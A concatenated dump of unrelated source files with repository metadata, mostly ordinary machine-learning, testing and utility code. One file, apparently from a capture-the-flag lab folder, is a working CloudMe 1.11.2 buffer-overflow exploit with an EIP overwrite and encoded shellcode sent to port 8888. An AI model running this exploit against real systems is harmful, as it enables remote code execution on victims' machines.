# xd3 = torch.mul(xd3,self.sse_attention(xd2))
# xd2 = torch.mul(xd2,self.sse_attention(xd2))#顶部
if self.method == 'zhongji_loss':
out = []
out.append(xd2)
out.append(xd3)
out.append(xd4)
for i in range(len(out)):
out[i] = self.final_layer(out[i])
return out
elif self.method == 'sum_loss':
x = xd4+xd3+xd2
x = self.final_layer(x) # 1x1
return x
def init_weights(self, pretrained=''):
if os.path.isfile(pretrained):
logger.info('=> init deconv2 weights from normal distribution')
for name, m in self.deconv_layers2.named_modules():
if isinstance(m, nn.Conv2d):
# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
nn.init.normal_(m.weight, std=0.001)
logger.info(
'=> init {}.weight as normal(0, 0.001)'.format(name))
if isinstance(m, nn.ConvTranspose2d):
logger.info(
'=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
if self.deconv_with_bias:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
logger.info('=> init {}.weight as 1'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
logger.info('=> init deconv3 weights from normal distribution')
for name, m in self.deconv_layers3.named_modules():
if isinstance(m, nn.Conv2d):
# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
nn.init.normal_(m.weight, std=0.001)
if isinstance(m, nn.ConvTranspose2d):
logger.info(
'=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
if self.deconv_with_bias:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
logger.info('=> init {}.weight as 1'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
logger.info('=> init deconv4 weights from normal distribution')
for name, m in self.deconv_layers4.named_modules(): # 【】有没有简便一点的对几个层都处理的
if isinstance(m, nn.Conv2d):
# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
nn.init.normal_(m.weight, std=0.001)
if isinstance(m, nn.ConvTranspose2d):
logger.info(
'=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
if self.deconv_with_bias:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
logger.info('=> init {}.weight as 1'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
logger.info('=> init final conv weights from normal distribution')
for m in self.final_layer.modules():
if isinstance(m, nn.Conv2d):
# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
logger.info(
'=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
nn.init.constant_(m.bias, 0)
pretrained_state_dict = torch.load(pretrained)
logger.info('=> loading pretrained model {}'.format(
pretrained)) # 初始化的是后半段,预训练的是resnet
self.load_state_dict(pretrained_state_dict, strict=False)
else:
logger.info('=> init weights from normal distribution')
for m in self.modules():
if isinstance(m, nn.Conv2d):
# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
nn.init.normal_(m.weight, std=0.001)
# nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.ConvTranspose2d):
nn.init.normal_(m.weight, std=0.001)
if self.deconv_with_bias:
# 干嘛不直接共用上部分:上半部分只初始化了后半部分
nn.init.constant_(m.bias, 0)
resnet_spec = {
18: (BasicBlock, [2, 2, 2, 2]), # 18是键名
34: (BasicBlock, [3, 4, 6, 3]),
50: (Bottleneck, [3, 4, 6, 3]), # 【】和34的差别在?Bottleneck?
101: (Bottleneck, [3, 4, 23, 3]),
152: (Bottleneck, [3, 8, 36, 3])
}
# 测试
def get_pose_net(cfg, is_train, **kwargs):
num_layers = cfg.MODEL.EXTRA.NUM_LAYERS
# 怎么对应上50的 Bottleneck是哪儿:下面一句
block_class, layers = resnet_spec[num_layers]
model = MultiResNet(block_class, layers, cfg, **kwargs)
if is_train and cfg.MODEL.INIT_WEIGHTS:
model.init_weights(cfg.MODEL.PRETRAINED) # 类的函数要调用了才执行
return model
| 38.707415
| 116
| 0.549003
|
dffa55ad843dd8d85009ce62fd84ab4bd4e24749
| 817
|
py
|
Python
|
venv/lib/python3.8/site-packages/astroid/brain/brain_threading.py
|
VikrantAgrahari/littlegenius
|
f7a7d5f2ecacb862317df35e83de4ae43b5a1bc9
|
[
"MIT"
] | 10
|
2020-07-21T21:59:54.000Z
|
2021-07-19T11:01:47.000Z
|
Thonny/Lib/site-packages/astroid/brain/brain_threading.py
|
Pydiderot/pydiderotIDE
|
a42fcde3ea837ae40c957469f5d87427e8ce46d3
|
[
"MIT"
] | 51
|
2019-10-08T01:53:02.000Z
|
2021-06-04T22:02:21.000Z
|
Thonny/Lib/site-packages/astroid/brain/brain_threading.py
|
Pydiderot/pydiderotIDE
|
a42fcde3ea837ae40c957469f5d87427e8ce46d3
|
[
"MIT"
] | 10
|
2021-05-13T16:18:53.000Z
|
2021-11-08T14:30:08.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Claudiu Popa <pcmanticore@gmail.com>
# Copyright (c) 2017 Łukasz Rogalski <rogalski.91@gmail.com>
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/master/COPYING.LESSER
import astroid
def _thread_transform():
return astroid.parse(
"""
class lock(object):
def acquire(self, blocking=True, timeout=-1):
pass
def release(self):
pass
def __enter__(self):
return True
def __exit__(self, *args):
pass
def locked(self):
return False
def Lock():
return lock()
"""
)
astroid.register_module_extender(astroid.MANAGER, "threading", _thread_transform)
| 25.53125
| 85
| 0.620563
|
3a5b082fa98d449bae223acc0e76a71705dfd4a3
| 1,148
|
py
|
Python
|
tests/test_navigation.py
|
daviur/voombot_simulator
|
729dbd6624764bb405315846b8fbb6cec337e2dc
|
[
"MIT"
] | null | null | null |
tests/test_navigation.py
|
daviur/voombot_simulator
|
729dbd6624764bb405315846b8fbb6cec337e2dc
|
[
"MIT"
] | null | null | null |
tests/test_navigation.py
|
daviur/voombot_simulator
|
729dbd6624764bb405315846b8fbb6cec337e2dc
|
[
"MIT"
] | null | null | null |
import pytest
from voombot_simulator.navigation import CardinalPoint, Coordinates2D
def test_add_coordinates():
assert Coordinates2D(2, 3) + Coordinates2D(-1, -3) == Coordinates2D(1, 0)
@pytest.mark.parametrize('coord1,coord2,expected', [
(Coordinates2D(1, 1), Coordinates2D(1, 1), True),
(Coordinates2D(1, 1), Coordinates2D(0, 0), False)
])
def test_equality(coord1, coord2, expected):
assert (coord1 == coord2) is expected
def test_coordinates_order():
assert Coordinates2D(2, 3) <= Coordinates2D(5, 6)
@pytest.mark.parametrize('input,expected', [
(CardinalPoint.N, CardinalPoint.E),
(CardinalPoint.E, CardinalPoint.S),
(CardinalPoint.S, CardinalPoint.W),
(CardinalPoint.W, CardinalPoint.N)
])
def test_clockwise(input, expected):
assert CardinalPoint.clockwise(input) == expected
@pytest.mark.parametrize('input,expected', [
(CardinalPoint.N, CardinalPoint.W),
(CardinalPoint.W, CardinalPoint.S),
(CardinalPoint.S, CardinalPoint.E),
(CardinalPoint.E, CardinalPoint.N)
])
def test_counter_clockwise(input, expected):
assert CardinalPoint.counter_clockwise(input) == expected
| 28.7
| 77
| 0.726481
|
f7974190526d4dcfa6f58848aeb4822711686b8e
| 1,347
|
py
|
Python
|
python/pyarrow/flight.py
|
DeliangFan/arrow
|
7b43bcfaad5b8146f54d9975adb9bb8c88fbc60d
|
[
"Apache-2.0"
] | 1
|
2021-07-07T07:13:51.000Z
|
2021-07-07T07:13:51.000Z
|
python/pyarrow/flight.py
|
DeliangFan/arrow
|
7b43bcfaad5b8146f54d9975adb9bb8c88fbc60d
|
[
"Apache-2.0"
] | 1
|
2019-02-24T17:12:35.000Z
|
2019-02-24T18:46:21.000Z
|
python/pyarrow/flight.py
|
DeliangFan/arrow
|
7b43bcfaad5b8146f54d9975adb9bb8c88fbc60d
|
[
"Apache-2.0"
] | 3
|
2021-03-23T19:45:48.000Z
|
2021-03-23T21:36:16.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from pyarrow._flight import (Action, # noqa
ActionType,
DescriptorType,
FlightClient,
FlightDescriptor,
FlightEndpoint,
FlightInfo,
FlightServerBase,
GeneratorStream,
Location,
Ticket,
RecordBatchStream,
Result)
| 43.451613
| 62
| 0.582777
|
a1e6add303e8eda7c5e734eac01a72e276824fd6
| 2,646
|
py
|
Python
|
Machines/BUFF/x-files/48389.py
|
limitedeternity/HackTheBox
|
ed8d6fc7ff7b880b1961098bedca1fc5fdf7fd09
|
[
"MIT"
] | null | null | null |
Machines/BUFF/x-files/48389.py
|
limitedeternity/HackTheBox
|
ed8d6fc7ff7b880b1961098bedca1fc5fdf7fd09
|
[
"MIT"
] | null | null | null |
Machines/BUFF/x-files/48389.py
|
limitedeternity/HackTheBox
|
ed8d6fc7ff7b880b1961098bedca1fc5fdf7fd09
|
[
"MIT"
] | 3
|
2021-12-29T10:39:01.000Z
|
2022-03-29T22:56:40.000Z
|
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
import sys
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
payload = b""
payload += b"\xba\xa4\x1c\xa2\x72\xd9\xeb\xd9\x74\x24\xf4\x58\x29"
payload += b"\xc9\xb1\x52\x31\x50\x12\x83\xc0\x04\x03\xf4\x12\x40"
payload += b"\x87\x08\xc2\x06\x68\xf0\x13\x67\xe0\x15\x22\xa7\x96"
payload += b"\x5e\x15\x17\xdc\x32\x9a\xdc\xb0\xa6\x29\x90\x1c\xc9"
payload += b"\x9a\x1f\x7b\xe4\x1b\x33\xbf\x67\x98\x4e\xec\x47\xa1"
payload += b"\x80\xe1\x86\xe6\xfd\x08\xda\xbf\x8a\xbf\xca\xb4\xc7"
payload += b"\x03\x61\x86\xc6\x03\x96\x5f\xe8\x22\x09\xeb\xb3\xe4"
payload += b"\xa8\x38\xc8\xac\xb2\x5d\xf5\x67\x49\x95\x81\x79\x9b"
payload += b"\xe7\x6a\xd5\xe2\xc7\x98\x27\x23\xef\x42\x52\x5d\x13"
payload += b"\xfe\x65\x9a\x69\x24\xe3\x38\xc9\xaf\x53\xe4\xeb\x7c"
payload += b"\x05\x6f\xe7\xc9\x41\x37\xe4\xcc\x86\x4c\x10\x44\x29"
payload += b"\x82\x90\x1e\x0e\x06\xf8\xc5\x2f\x1f\xa4\xa8\x50\x7f"
payload += b"\x07\x14\xf5\xf4\xaa\x41\x84\x57\xa3\xa6\xa5\x67\x33"
payload += b"\xa1\xbe\x14\x01\x6e\x15\xb2\x29\xe7\xb3\x45\x4d\xd2"
payload += b"\x04\xd9\xb0\xdd\x74\xf0\x76\x89\x24\x6a\x5e\xb2\xae"
payload += b"\x6a\x5f\x67\x60\x3a\xcf\xd8\xc1\xea\xaf\x88\xa9\xe0"
payload += b"\x3f\xf6\xca\x0b\xea\x9f\x61\xf6\x7d\xaa\x7f\xf6\xf8"
payload += b"\xc2\x7d\x06\x12\x4e\x0b\xe0\x7e\x60\x5d\xbb\x16\x19"
payload += b"\xc4\x37\x86\xe6\xd2\x32\x88\x6d\xd1\xc3\x47\x86\x9c"
payload += b"\xd7\x30\x66\xeb\x85\x97\x79\xc1\xa1\x74\xeb\x8e\x31"
payload += b"\xf2\x10\x19\x66\x53\xe6\x50\xe2\x49\x51\xcb\x10\x90"
payload += b"\x07\x34\x90\x4f\xf4\xbb\x19\x1d\x40\x98\x09\xdb\x49"
payload += b"\xa4\x7d\xb3\x1f\x72\x2b\x75\xf6\x34\x85\x2f\xa5\x9e"
payload += b"\x41\xa9\x85\x20\x17\xb6\xc3\xd6\xf7\x07\xba\xae\x08"
payload += b"\xa7\x2a\x27\x71\xd5\xca\xc8\xa8\x5d\xea\x2a\x78\xa8"
payload += b"\x83\xf2\xe9\x11\xce\x04\xc4\x56\xf7\x86\xec\x26\x0c"
payload += b"\x96\x85\x23\x48\x10\x76\x5e\xc1\xf5\x78\xcd\xe2\xdf"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)
| 44.1
| 68
| 0.679894
|
a1d3f2c388e0ecf2bbeae8f52cf271c801eb5fbc
| 3,647
|
py
|
Python
|
tests/test_optimizer_with_nn.py
|
ryancinsight/pytorch-optimizer
|
5e7b5edc25f6a2e6f3af532a48380bd68bd45326
|
[
"Apache-2.0"
] | null | null | null |
tests/test_optimizer_with_nn.py
|
ryancinsight/pytorch-optimizer
|
5e7b5edc25f6a2e6f3af532a48380bd68bd45326
|
[
"Apache-2.0"
] | null | null | null |
tests/test_optimizer_with_nn.py
|
ryancinsight/pytorch-optimizer
|
5e7b5edc25f6a2e6f3af532a48380bd68bd45326
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import pytest
import torch
from torch import nn
import torch_optimizer as optim
def make_dataset(seed=42):
rng = np.random.RandomState(seed)
N = 100
D = 2
X = rng.randn(N, D) * 2
# center the first N/2 points at (-2,-2)
mid = N // 2
X[:mid, :] = X[:mid, :] - 2 * np.ones((mid, D))
# center the last N/2 points at (2, 2)
X[mid:, :] = X[mid:, :] + 2 * np.ones((mid, D))
# labels: first N/2 are 0, last N/2 are 1
Y = np.array([0] * mid + [1] * mid).reshape(100, 1)
x = torch.Tensor(X)
y = torch.Tensor(Y)
return x, y
class LogisticRegression(nn.Module):
def __init__(self):
super(LogisticRegression, self).__init__()
self.linear1 = nn.Linear(2, 4)
self.linear2 = nn.Linear(4, 1)
def forward(self, x):
output = torch.relu(self.linear1(x))
output = self.linear2(output)
y_pred = torch.sigmoid(output)
return y_pred
def ids(v):
return '{} {}'.format(v[0].__name__, v[1:])
def build_lookahead(*a, **kw):
base = optim.Yogi(*a, **kw)
return optim.Lookahead(base)
optimizers = [
(build_lookahead, {'lr': 0.1, 'weight_decay': 1e-3}, 200),
(optim.A2GradExp, {'lips': 1.0, 'beta': 1e-3}, 200),
(optim.A2GradInc, {'lips': 1.0, 'beta': 1e-3}, 200),
(optim.A2GradUni, {'lips': 1.0, 'beta': 1e-3}, 200),
(optim.AccSGD, {'lr': 1.0, 'weight_decay': 1e-3}, 200),
(optim.AdaBelief, {'lr': 0.1, 'weight_decay': 1e-3}, 200),
(optim.AdaBound, {'lr': 1.5, 'gamma': 0.1, 'weight_decay': 1e-3}, 200),
(optim.AdaMod, {'lr': 2.0, 'weight_decay': 1e-3}, 200),
(optim.Adafactor, {'lr': None, 'weight_decay': 1e-3}, 200),
(optim.AdamP, {'lr': 0.045, 'weight_decay': 1e-3}, 800),
(optim.AggMo, {'lr': 1.0, 'weight_decay': 1e-3}, 200),
(optim.Apollo, {'lr': 0.1, 'weight_decay': 1e-3}, 200),
(optim.DiffGrad, {'lr': 0.5, 'weight_decay': 1e-3}, 200),
(optim.Lamb, {'lr': 0.01, 'weight_decay': 1e-3}, 200),
(optim.MADGRAD, {'lr': 1.0, 'weight_decay': 1e-3}, 200),
(optim.NovoGrad, {'lr': 0.01, 'weight_decay': 1e-3}, 200),
(optim.PID, {'lr': 0.01, 'weight_decay': 1e-3, 'momentum': 0.1}, 200),
(optim.QHAdam, {'lr': 0.1, 'weight_decay': 1e-3}, 200),
(optim.QHM, {'lr': 0.1, 'weight_decay': 1e-5, 'momentum': 0.2}, 200),
(optim.RAdam, {'lr': 1.0, 'weight_decay': 1e-3}, 200),
(optim.Ranger, {'lr': 0.1, 'weight_decay': 1e-3}, 200),
(optim.RangerQH, {'lr': 0.01, 'weight_decay': 1e-3}, 200),
(optim.RangerVA, {'lr': 0.01, 'weight_decay': 1e-3}, 200),
(optim.SGDP, {'lr': 1.0, 'weight_decay': 1e-3}, 200),
(optim.SGDW, {'lr': 1.0, 'weight_decay': 1e-3}, 200),
(optim.SWATS, {'lr': 1.0, 'weight_decay': 1e-3}, 200),
(optim.Shampoo, {'lr': 0.1, 'weight_decay': 1e-3, 'momentum': 0.8}, 200),
(optim.Yogi, {'lr': 0.1, 'weight_decay': 1e-3}, 200),
(optim.Adahessian, {'lr': 0.1, 'weight_decay': 1e-3}, 200),
]
@pytest.mark.parametrize('optimizer_config', optimizers, ids=ids)
def test_basic_nn_modeloptimizer_config(optimizer_config):
torch.manual_seed(42)
x_data, y_data = make_dataset()
model = LogisticRegression()
loss_fn = nn.BCELoss()
optimizer_class, config, iterations = optimizer_config
optimizer = optimizer_class(model.parameters(), **config)
init_loss = None
for _ in range(iterations):
y_pred = model(x_data)
loss = loss_fn(y_pred, y_data)
if init_loss is None:
init_loss = loss
optimizer.zero_grad()
loss.backward(create_graph=True)
optimizer.step()
assert init_loss.item() > 2.0 * loss.item()
| 34.733333
| 77
| 0.584042
|
f24cd77bc71b2073013da7be92115efa9950b906
| 370
|
py
|
Python
|
lib/JumpScale/core/config/__init__.py
|
rudecs/jumpscale_core7
|
30c03f26f1cdad3edbb9d79d50fbada8acc974f5
|
[
"Apache-2.0"
] | 1
|
2015-10-26T10:38:13.000Z
|
2015-10-26T10:38:13.000Z
|
lib/JumpScale/core/config/__init__.py
|
rudecs/jumpscale_core7
|
30c03f26f1cdad3edbb9d79d50fbada8acc974f5
|
[
"Apache-2.0"
] | 4
|
2016-08-25T12:08:39.000Z
|
2018-04-12T12:36:01.000Z
|
lib/JumpScale/core/config/__init__.py
|
rudecs/jumpscale_core7
|
30c03f26f1cdad3edbb9d79d50fbada8acc974f5
|
[
"Apache-2.0"
] | 3
|
2016-03-08T07:49:34.000Z
|
2018-10-19T13:56:43.000Z
|
from JumpScale import j
#from JumpScale.core.config.IConfigBase import ConfigManagementItem, GroupConfigManagement, SingleConfigManagement
#from JumpScale.core.config.JConfigBase import ConfiguredItem, ConfiguredItemGroup
#from JumpScale.core.config.ConfigLib import ItemGroupClass, ItemSingleClass
from JumpScale.core.config.JConfig import JConfig
j.config=JConfig()
| 41.111111
| 114
| 0.864865
|
27dec653fc6375567218c0dc9cbcd421a98c353e
| 1,554
|
py
|
Python
|
python/35.search-insert-position.py
|
Zhenye-Na/leetcode
|
95196a45f5709ccf7b970ee5ac84a4bf8fe2301e
|
[
"MIT"
] | 10
|
2019-09-15T00:23:57.000Z
|
2022-01-05T12:53:42.000Z
|
python/35.search-insert-position.py
|
Zhenye-Na/leetcode
|
95196a45f5709ccf7b970ee5ac84a4bf8fe2301e
|
[
"MIT"
] | 3
|
2021-06-30T00:39:26.000Z
|
2021-08-01T07:13:59.000Z
|
python/35.search-insert-position.py
|
Zhenye-Na/leetcode
|
95196a45f5709ccf7b970ee5ac84a4bf8fe2301e
|
[
"MIT"
] | 6
|
2020-02-08T02:55:22.000Z
|
2022-01-02T22:48:18.000Z
|
#
# @lc app=leetcode id=35 lang=python3
#
# [35] Search Insert Position
#
# https://leetcode.com/problems/search-insert-position/description/
#
# algorithms
# Easy (42.78%)
# Likes: 3231
# Dislikes: 284
# Total Accepted: 777K
# Total Submissions: 1.8M
# Testcase Example: '[1,3,5,6]\n5'
#
# Given a sorted array of distinct integers and a target value, return the
# index if the target is found. If not, return the index where it would be if
# it were inserted in order.
#
#
# Example 1:
# Input: nums = [1,3,5,6], target = 5
# Output: 2
# Example 2:
# Input: nums = [1,3,5,6], target = 2
# Output: 1
# Example 3:
# Input: nums = [1,3,5,6], target = 7
# Output: 4
# Example 4:
# Input: nums = [1,3,5,6], target = 0
# Output: 0
# Example 5:
# Input: nums = [1], target = 0
# Output: 0
#
#
# Constraints:
#
#
# 1 <= nums.length <= 10^4
# -10^4 <= nums[i] <= 10^4
# nums contains distinct values sorted in ascending order.
# -10^4 <= target <= 10^4
#
#
#
# @lc code=start
class Solution:
def searchInsert(self, nums: List[int], target: int) -> int:
# the last number smaller than target, idx + 1
if not nums or len(nums) == 0:
return 0
start, end = 0, len(nums) - 1
while start + 1 < end:
mid = (start + end) // 2
if nums[mid] >= target:
end = mid
else:
start = mid
if nums[end] < target:
return end + 1
if nums[start] < target:
return start + 1
return 0
# @lc code=end
| 20.72
| 77
| 0.564994
|
61765fc5080d3855bd0c8d2f5207f1f1adcd772e
| 715
|
py
|
Python
|
contentful_management/environment_assets_proxy.py
|
bram-rongen/contentful-management.py
|
dc94fa2ece08b56dd5a995511af1c64ca2e6bee5
|
[
"MIT"
] | 30
|
2017-04-13T20:58:22.000Z
|
2021-12-30T22:13:43.000Z
|
contentful_management/environment_assets_proxy.py
|
bram-rongen/contentful-management.py
|
dc94fa2ece08b56dd5a995511af1c64ca2e6bee5
|
[
"MIT"
] | 42
|
2017-04-15T02:10:48.000Z
|
2022-03-10T23:30:26.000Z
|
contentful_management/environment_assets_proxy.py
|
bram-rongen/contentful-management.py
|
dc94fa2ece08b56dd5a995511af1c64ca2e6bee5
|
[
"MIT"
] | 15
|
2017-06-02T12:57:48.000Z
|
2020-12-08T13:34:36.000Z
|
from .environment_resource_proxy import EnvironmentResourceProxy
from .assets_proxy import AssetsProxy
"""
contentful_management.environment_assets_proxy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module implements the EnvironmentAssetsProxy class.
API reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/entries
:copyright: (c) 2018 by Contentful GmbH.
:license: MIT, see LICENSE for more details.
"""
class EnvironmentAssetsProxy(EnvironmentResourceProxy):
"""
API reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/entries
"""
def _resource_proxy_class(self):
return AssetsProxy
| 28.6
| 115
| 0.746853
|
6f071f71fbca848516794867727c07f121b22a34
| 174
|
py
|
Python
|
.history/CourseLessions/FlowControlWithLoops/if_else_20210623204519.py
|
minefarmer/Complete-Coding-E-Degree
|
7044d32b155d0fb2520c3234a0a4e3b2b44fa84b
|
[
"Unlicense"
] | null | null | null |
.history/CourseLessions/FlowControlWithLoops/if_else_20210623204519.py
|
minefarmer/Complete-Coding-E-Degree
|
7044d32b155d0fb2520c3234a0a4e3b2b44fa84b
|
[
"Unlicense"
] | null | null | null |
.history/CourseLessions/FlowControlWithLoops/if_else_20210623204519.py
|
minefarmer/Complete-Coding-E-Degree
|
7044d32b155d0fb2520c3234a0a4e3b2b44fa84b
|
[
"Unlicense"
] | null | null | null |
"""[If/Else]
Focus of this section is on controlling the flow of my data and coding with loops
If and else statements are key and our introduction into logical programmin
"""
| 43.5
| 81
| 0.781609
|
7c424293381b95153ce99a43d55d339634767350
| 81
|
py
|
Python
|
Build_Web_With_Flask/Building web applications with Flask_Code/chapter10/chapter10/wsgi.py
|
abacuspix/NFV_project
|
f5585a6750119b1f954fea65c37a14badad1fd62
|
[
"MIT"
] | null | null | null |
Build_Web_With_Flask/Building web applications with Flask_Code/chapter10/chapter10/wsgi.py
|
abacuspix/NFV_project
|
f5585a6750119b1f954fea65c37a14badad1fd62
|
[
"MIT"
] | null | null | null |
Build_Web_With_Flask/Building web applications with Flask_Code/chapter10/chapter10/wsgi.py
|
abacuspix/NFV_project
|
f5585a6750119b1f954fea65c37a14badad1fd62
|
[
"MIT"
] | null | null | null |
# coding:utf-8
from main import app_factory
app = app_factory(name="myproject")
| 16.2
| 35
| 0.765432
|
61f11d891c8ee23952c3f7aaa6204d1da72b7420
| 5,695
|
py
|
Python
|
data_tools/lgbm/parameters.py
|
lopez86/DataTools
|
573419f3a40ddeb5e9eaf5ced8ea8dbf41c8a65e
|
[
"MIT"
] | null | null | null |
data_tools/lgbm/parameters.py
|
lopez86/DataTools
|
573419f3a40ddeb5e9eaf5ced8ea8dbf41c8a65e
|
[
"MIT"
] | null | null | null |
data_tools/lgbm/parameters.py
|
lopez86/DataTools
|
573419f3a40ddeb5e9eaf5ced8ea8dbf41c8a65e
|
[
"MIT"
] | null | null | null |
from enum import Enum
from typing import List
import funcy
class Task(Enum):
TRAIN = 'train'
PREDICT = 'predict'
CONVERT_MODEL = 'convert_model'
REFIT = 'refit'
class Objective(Enum):
REGRESSION = 'regression'
REGRESSION_L1 = 'regression_l1'
HUBER = 'huber'
FAIR = 'fair'
POISSON = 'poisson'
QUANTILE = 'quantile'
MAPE = 'mape'
GAMMA = 'gammma'
TWEEDIE = 'tweedie'
BINARY = 'binary'
MULTICLASS = 'multiclass'
MULTICLASSOVA = 'multiclassova'
XENTROPY = 'xentropy'
XENTLAMBDA = 'xentlambda'
LAMBDARANK = 'lambdarank'
class Boosting(Enum):
GBDT = 'gbdt'
RF = 'rf'
DART = 'dart'
GOSS = 'goss'
class TreeLearner(Enum):
SERIAL = 'serial'
FEATURE = 'feature'
DATA = 'data'
VOTING = 'voting'
class DeviceType(Enum):
CPU = 'cpu'
GPU = 'gpu'
class Metric(Enum):
DEFAULT = ''
NONE = 'None'
MAE = 'mae'
MSE = 'mse'
RMSE = 'rmse'
QUANTILE = 'quantile'
MAPE = 'mape'
HUBER = 'huber'
POISSON = 'poisson'
GAMMA = 'gamma'
GAMMA_DEVIANCE = 'gamma_deviance'
TWEEDIE = 'tweedie'
NDCG = 'ndcg'
MAP = 'map'
AUC = 'auc'
BINARY_LOGLOSS = 'binary_logloss'
BINARY_ERROR = 'binary_error'
MULTI_LOGLOSS = 'multi_logloss'
MULTI_ERROR = 'multi_error'
KLDIV = 'kldiv'
class LGBMParameterBuilder:
def __init__(self):
self._params = {}
def set_config(self, config: str):
self._params['config'] = config
return self
def set_task(self, task: Task):
self._params['task'] = task.value
return self
def set_objective(self, objective: Objective):
self._params['objective'] = objective.value
return self
def set_boosting(self, value: Boosting):
self._params['boosting'] = value.value
return self
def set_learning_rate(self, value: float):
self._params['learning_rate'] = value
return self
def set_num_leaves(self, value: int):
self._params['num_leaves'] = value
return self
def set_tree_learner(self, value: TreeLearner):
self._params['tree_learner'] = value
return self
def set_num_threads(self, value: int):
self._params['num_threads'] = value
return self
def set_device_type(self, value: DeviceType):
self._params['device_type'] = value.value
return self
def set_seed(self, value: int):
self._params['seed'] = value
return self
def set_max_depth(self, value: int):
self._params['max_depth'] = value
return self
def set_min_data_in_leaf(self, value: int):
self._params['min_data_in_leaf'] = value
return self
def set_min_sum_hessian_in_leaf(self, value: float):
self._params['min_sum_hessian_in_leaf'] = value
return self
def set_bagging_fraction(self, value: float):
self._params['bagging_fraction'] = value
return self
def set_bagging_freq(self, value: int):
self._params['bagging_freq'] = value
return self
def set_bagging_seed(self, value: int):
self._params['bagging_seed'] = value
return self
def set_feature_fraction(self, value: float):
self._params['feature_fraction'] = value
return self
def set_feature_fraction_seed(self, value: int):
self._params['feature_fraction_seed'] = value
return self
def set_early_stopping_round(self, value: int):
self._params['early_stopping_round'] = value
return self
def set_max_delta_step(self, value: float):
self._params['max_delta_step'] = value
return self
def set_lambda_l1(self, value: float):
self._params['lambda_l1'] = value
return self
def set_lambda_l2(self, value: float):
self._params['lambda_l2'] = value
return self
def set_min_gain_to_split(self, value: float):
self._params['min_gain_to_split'] = value
return self
def set_verbosity(self, value: int):
self._params['verbosity'] = value
return self
def set_num_class(self, value: int):
self._params['num_class'] = value
return self
def set_is_unbalance(self, value: bool):
if value is True and 'scale_pos_weight' in self._params:
raise ParameterError(
'is_unbalance and scale_pos_weight cannot both be used.'
)
self._params['is_unbalance'] = value
return self
def set_scale_pos_weight(self, value: float):
if self._params.get('is_unbalance', False) is True:
raise ParameterError(
'is_unbalance and scale_pos_weight cannot both be used.'
)
self._params['scale_pos_weight'] = value
return self
def add_metric(self, value: Metric):
self._params['metric'] = funcy.ldistinct(
self._params.get('metric', []).append(value.value)
)
return self
def add_metrics(self, values: List[Metric]):
self._params['metric'] = funcy.ldistinct(
self._params.get('metric', []) + [v.value for v in values]
)
return self
def set_is_provide_training_metric(self, value: bool):
self._params['is_provide_training_metric'] = value
return self
def construct(self) -> dict:
return self._params
class ParameterError(Exception):
pass
| 26.365741
| 73
| 0.597015
|
5f3212a40f92cc292c273e407525e8c4fd9683a5
| 2,315
|
py
|
Python
|
Packages/Tag/tag_close_tag.py
|
262877348/Data
|
46e7ea20929ecb0496edd72efd0d2a599f0e49d9
|
[
"Apache-2.0"
] | null | null | null |
Packages/Tag/tag_close_tag.py
|
262877348/Data
|
46e7ea20929ecb0496edd72efd0d2a599f0e49d9
|
[
"Apache-2.0"
] | null | null | null |
Packages/Tag/tag_close_tag.py
|
262877348/Data
|
46e7ea20929ecb0496edd72efd0d2a599f0e49d9
|
[
"Apache-2.0"
